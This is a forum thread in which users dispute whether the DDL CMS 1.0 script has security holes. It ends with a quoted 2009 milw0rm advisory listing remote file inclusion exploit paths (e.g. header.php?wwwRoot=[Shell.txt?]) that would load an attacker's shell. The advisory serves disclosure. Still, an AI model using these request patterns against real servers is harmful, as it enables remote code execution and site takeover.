Lmao When was this last replied to DEViANCE?
Full of exploits anyway.
Based on KDDL, what do you expect lol.
I just installed this and am pretty impressed.
The fact you need to chown files after auto install is pretty annoying though, also i noticed if you use the "template" category it will mess up the template a bit at the top in the search as it makes the selection box too wide.
Also the auto submitter appears to replace/remove & from links which is no good.
Am really looking forward to the update, and the skins your talking about, are they free?
And can you give a list of features/improvements for next release yet?
Anyway thanks for a great script![]()
If you aren't trying to bash my script, then what are you trying to do? Help me? Like the others who have provided useful information and have given me suggestions and such? Who are you trying to fool? No one on this board I bet (except yourself).Little Dragon im not "bashing" or whatever you want to call it.
I'm just stating that, genuinly and truthfully, it is full of exploits. Not my problem if you can't find them yourself.
Strange example, but dragon should know how to remove examples.
So it isn't really relevant.
Anyway, as I said in my previous post and every other relevant post, i'm posting facts, nothing related to little dragon himself.
Its only the first version though and has a lot of features, it bound to have some teething problems but its a far more complete script than ANYTHING out there now, i have tried them all.
Why not help rather than saying "its your own fault if you can't find them" ??
Definently looking forward to it Little Dragon :D . I'm even loving version 1.0 which means the next version will rock.
I love it when I get quoted so many times.
I posted here saying it contains exploits, because it does.
As for your reasoning of one exploit being due to "allow_url_include", the script should check paths before it tries including them (which it isn't, obviously). Regardless of if that server setting is set or not, that variable in the URL should be checked to be within the server's directories and not above a certain level. Coders should know these kind of things instead of blaming it on a server setting. The server setting just "enables" the exploit, it isn't the reason for it. The reason for it is the code.
+============================================================+
| |
| DDL CMS 1.0 Multiple Remote File Inclusion Vulnerabilities |
| |
+============================================================+
| |
| Author : HxH |
| |
| E-Mail : HxH[at]live[dot]at |
| |
+------------------------------------------------------------+
| |
| Script : http://www.ddlcms.com/DDLCMS_v1.0.zip |
| |
+------------------------------------------------------------+
| |
| Exploit : |
| |
| /header.php?wwwRoot=[Shell.txt?] |
| |
| /submit.php?wwwRoot=[Shell.txt?] |
| |
| /submitted.php?wwwRoot=[Shell.txt?] |
| |
| /autosubmitter/index.php?wwwRoot=[Shell.txt?] |
| |
+============================================================+
| |
| Greetz : ~ JiKo ~ ThE X ~ TSH ~ All No-Exploit.com Members |
| |
+============================================================+
# milw0rm.com [2009-09-21]